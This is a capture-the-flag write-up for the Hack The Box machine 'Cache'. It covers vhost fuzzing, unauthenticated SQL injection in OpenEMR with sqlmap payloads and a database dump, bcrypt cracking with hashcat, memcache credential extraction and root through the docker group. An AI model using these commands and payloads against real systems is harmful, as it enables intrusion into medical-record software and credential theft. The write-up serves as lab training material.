Cache - HTB
Cache, is a medium rated box. Initial foothold gained by vhost discovery and exploit a webapp and privesc gained by accessing memcache server for a user and exploiting the docker group for root
Cache, is a medium rated box. Initial foothold gained by vhost discovery and exploit a webapp and privesc gained by accessing memcache server for a user and exploiting the docker group for root
Recon
nmap
Start the box with a nmap scan to identify what services are running on the box, including the version of the service.
HTB/machines/Cache [I] ➜ nmap -sC -sV -Pn -o cache.nmap 10.10.10.188
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-23 17:55 PDT
Nmap scan report for 10.10.10.188
Host is up (0.16s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:2d:b2:a0:c4:57:e7:7c:35:2d:45:4d:db:80:8c:f1 (RSA)
| 256 bc:e4:16:3d:2a:59:a1:3a:6a:09:28:dd:36:10:38:08 (ECDSA)
|_ 256 57:d5:47:ee:07:ca:3a:c0:fd:9b:a8:7f:6b:4c:9d:7c (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Cache
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.53 seconds
From the scan we identified two services running:
- ssh
- web
ffuf
We now run ffuf, which is a website fuzzer used to identify files and folders
HTB/machines/Cache took 11m 43s [I] ➜ ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u http://10.10.10.188/FUZZ -ic -c -recursion -e .html,.txt -t 100 --timeout 60 -o dir.txt
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.0.2
________________________________________________
:: Method : GET
:: URL : http://10.10.10.188/FUZZ
:: Extensions : .html .txt
:: Output file : dir.txt
:: File format : json
:: Follow redirects : false
:: Calibration : false
:: Timeout : 60
:: Threads : 100
:: Matcher : Response status: 200,204,301,302,307,401,403
________________________________________________
[Status: 200, Size: 8193, Words: 902, Lines: 339]
index.html [Status: 200, Size: 8193, Words: 902, Lines: 339]
.html [Status: 403, Size: 277, Words: 20, Lines: 10]
news.html [Status: 200, Size: 7231, Words: 948, Lines: 100]
login.html [Status: 200, Size: 2421, Words: 389, Lines: 106]
contactus.html [Status: 200, Size: 2539, Words: 283, Lines: 148]
author.html [Status: 200, Size: 1522, Words: 180, Lines: 68]
net.html [Status: 200, Size: 290, Words: 23, Lines: 19]
javascript [Status: 301, Size: 317, Words: 20, Lines: 10]
The results give us 5 files and 1 folder:
- index.html
- news.html
- login.html
- contactus.html
- author.html
- net.html
- javascript
ffuf - vhost
In addition to running a web discovery scan, we can run a vhost scan to see if there are any virtual hosts present. A vhost, virtual host, is a method used for host multiple website on single server.
HTB/machines/Cache took 1m 38s [I] ➜ ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/shubs-subdomains.txt -u http://cache.htb -H "Host: FUZZ.htb" -t 100 -fs 8193 -o vhost.txt
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.0.2
________________________________________________
:: Method : GET
:: URL : http://cache.htb
:: Header : Host: FUZZ.htb
:: Output file : vhost.txt
:: File format : json
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 100
:: Matcher : Response status: 200,204,301,302,307,401,403
:: Filter : Response size: 8193
________________________________________________
hms [Status: 302, Size: 0, Words: 1, Lines: 1]
The result gives us one vhost:
- hms
In order to access this vhost we need to edit the /etc/hosts file and include the following line
10.10.10.188 hms.htb
After editing the hosts file we can browse the new site.
Enumeration
cache.htb
On the first website, there is a landing page with a login page. The login page has the credential in the javascript file under the jquery folder. However once we login it just says the page is under construction.
$(function(){
var error_correctPassword = false;
var error_username = false;
function checkCorrectPassword(){
var Password = $("#password").val();
if(Password != 'H@v3_fun'){
alert("Password didn't Match");
error_correctPassword = true;
}
}
function checkCorrectUsername(){
var Username = $("#username").val();
if(Username != "ash"){
alert("Username didn't Match");
error_username = true;
}
}
$("#loginform").submit(function(event) {
/* Act on the event */
error_correctPassword = false;
checkCorrectPassword();
error_username = false;
checkCorrectUsername();
if(error_correctPassword == false && error_username ==false){
return true;
}
else{
return false;
}
});
});
hms.htb
On this second page, we are greeted with the OpenEMR login page.
After a few google search, we are greeted with this link has a list of vulnerabilities associated with the platform in version 5.0.1.3.
One of the more interesting vulnerabilites is the sql injection, that requires no authentication. Researching on how to exploit the sql injection vulnerability, I discovered this video.
The vulnerability report detailed high risk sql injection vulnerabilites, so now we can use sql map to enumerate the databases.
But before we can use sql map, we need to capture the request sent to the portal page. This is because in the vulnerability report it is detailed that we need to visit the portal registration page, to set the required cookie for the exploit will work.
This request was captured after visiting the portal registration page.
openemr_sqli
GET /portal/add_edit_event_user.php?eid=1 HTTP/1.1
Host: hms.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: OpenEMR=f3vout3rgkr0f1cq51sgv4lp60; PHPSESSID=mkaetqk3s0s9loeqs66n5704en
Upgrade-Insecure-Requests: 1
We can now sqlmap to actually exploit the sql injection
sqlmap
HTB/machines/Cache [I] ➜ sqlmap -r openemr_sqli --threads=10 --dbs
___
__H__
___ ___["]_____ ___ ___ {1.4.6#stable}
|_ -| . [)] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 10:25:34 /2020-06-30/
[10:25:34] [INFO] parsing HTTP request from 'openemr_sqli'
[10:25:35] [INFO] resuming back-end DBMS 'mysql'
[10:25:35] [INFO] testing connection to the target URL
[10:25:35] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: eid (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: eid=(SELECT (CASE WHEN (5418=5418) THEN 1 ELSE (SELECT 9498 UNION SELECT 3174) END))
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: eid=1 AND EXTRACTVALUE(6274,CONCAT(0x5c,0x7176786271,(SELECT (ELT(6274=6274,1))),0x7171766a71))
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: eid=1 AND (SELECT 8962 FROM (SELECT(SLEEP(5)))lNCr)
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: eid=1 UNION ALL SELECT NULL,NULL,CONCAT(0x7176786271,0x6b595159786b4c754c70796856424149674a67595670534a6b51426b434b5559687977414864774d,0x7171766a71),NULL-- -
---
[10:25:35] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.1
[10:25:35] [INFO] fetching database names
[10:25:35] [INFO] starting 2 threads
[10:25:35] [INFO] resumed: 'information_schema'
[10:25:35] [INFO] resumed: 'openemr'
available databases [2]:
[*] information_schema
[*] openemr
[10:25:35] [INFO] fetched data logged to text files under '/home/user/.sqlmap/output/hms.htb'
[*] ending @ 10:25:35 /2020-06-30/
From the results above we notice two databases
- information_schema
- openemr
Now we can use a different flag to enumerate the tables in the openmr database
HTB/machines/Cache took 21s [I] ➜ sqlmap -r openemr_sqli --threads=10 -D openemr --tables ✘1
___
__H__
___ ___[,]_____ ___ ___ {1.4.6#stable}
|_ -| . [.] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers
assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 10:27:20 /2020-06-30/
[10:27:20] [INFO] parsing HTTP request from 'openemr_sqli'
[10:27:20] [INFO] resuming back-end DBMS 'mysql'
[10:27:20] [INFO] testing connection to the target URL
[10:27:21] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: eid (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: eid=(SELECT (CASE WHEN (5418=5418) THEN 1 ELSE (SELECT 9498 UNION SELECT 3174) END))
Database: openemr
[234 tables]
+---------------------------------------+
| array |
| groups |
| sequences |
| version |
| addresses |
| amc_misc_data |
| amendments |
| amendments_history |
| ar_activity |
| ar_session |
| audit_details |
| audit_master |
| automatic_notification |
| background_services |
| batchcom |
| billing |
| calendar_external |
| categories |
| categories_seq |
| categories_to_documents |
| ccda |
| ccda_components |
| ccda_field_mapping |
| ccda_sections |
| ccda_table_mapping |
| chart_tracker |
| claims |
| clinical_plans |
| clinical_plans_rules |
| ... |
| ... |
| ... |
| user_settings |
| users |
| users_facility |
| users_secure |
| valueset |
| voids |
| x12_partners |
+---------------------------------------+
We can go through the users table to find credentials.
After enumerating, multiple users table, the users_secure table had a password hash
HTB/machines/Cache [I] ➜ sqlmap -r openemr_sqli --threads=10 -D openemr -T users_secure --dump ✘130
___
__H__
___ ___[,]_____ ___ ___ {1.4.6#stable}
|_ -| . [,] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers
assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 10:36:11 /2020-06-30/
...
...
...
Database: openemr
Table: users_secure
[1 entry]
+------+--------------------------------+---------------+--------------------------------------------------------------+---------------------+---------------+---------------+-------------------+-------------------+
| id | salt | username | password | last_update | salt_history1 | salt_history2 | password_history1 | password_history2 |
+------+--------------------------------+---------------+--------------------------------------------------------------+---------------------+---------------+---------------+-------------------+-------------------+
| 1 | $2a$05$l2sTLIG6GTBeyBf7TAKL6A$ | openemr_admin | $2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B. | 2019-11-21 06:38:40 | NULL | NULL | NULL | NULL |
+------+--------------------------------+---------------+--------------------------------------------------------------+---------------------+---------------+---------------+-------------------+-------------------+
hashcat
After we recovered the hash from the database we can run hashcat to try and recover the password
HTB/machines/Cache took 3s [I] ➜ hashcat --force -m 3200 --username hash.txt /usr/share/wordlists/SecLists/Passwords/xato-net-10-million-passwords-1000000.txt --status
hashcat (v5.1.0) starting...
...
...
...
Dictionary cache hit:
* Filename..: /usr/share/wordlists/SecLists/Passwords/xato-net-10-million-passwords-1000000.txt
* Passwords.: 1000000
* Bytes.....: 8557632
* Keyspace..: 1000000
$2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B.:xxxxxx
Session..........: hashcat
We can now login to the portal using the credentials, and use another exploit for the RCE.
Privesc
fluffy
Now that we have a foothold in the system, we run a enumaration script such as linenum or linux smart enum to gather information.
After running, in the case linux smart enum, we see that there are two services running on localhost.
- 3306 : runs mysql server
- 11211 : memcache server
The service of interest is the memcache service. We can search for exploits/vulnerabilities on the memcache service. After landing on this article we are able to extract information.
telnet localhost 11211
...
..
.
stats cachedump 1 0
stats cachedump 1 0
ITEM link [21 b; 0 s]
ITEM user [5 b; 0 s]
ITEM passwd [9 b; 0 s]
ITEM file [7 b; 0 s]
ITEM account [9 b; 0 s]
END
get link
get link
VALUE link 0 21
https://hackthebox.eu
END
get user
get user
VALUE user 0 5
luffy
END
get passwd
get passwd
VALUE passwd 0 9
0n3_p1ec3
END
We now have the password for luffy, hence we can now ssh.
After logging in, luffy is in the docker group, hence the user can run docker container. After reading stackoverflow, it is suggested to mount any folder we want and hence giving us access to that folder.
root
Now that we have access to luffy, and luffy can run docker containers we can essentialy mount any container to give us full access to that folder
docker run -it --rm -v /root:/mnt/root -v /home:/mnt/home ubuntu bash
After running that command, we can navigate to the /mnt folder to essentialy have complete access to the folders
luffy@cache:/var/tmp$ docker run -it --rm -v /root:/mnt/root -v /home:/mnt/home ubuntu bash
root@03b644f7f00a:/# cd /mnt
root@03b644f7f00a:/mnt# ls
home root
root@03b644f7f00a:/mnt# cat root/root.txt
5a9d4a7e1a99297e...
root@03b644f7f00a:/mnt# cat home/ash/user.txt
8c56519a89decc4f...
root@03b644f7f00a:/mnt#
Lessons Learned
Fuzz vhosts when the main page feels like a deadend, sqlmap can take in a requests file and be careful of who is in the docker group since they can effectively gain root access on the system.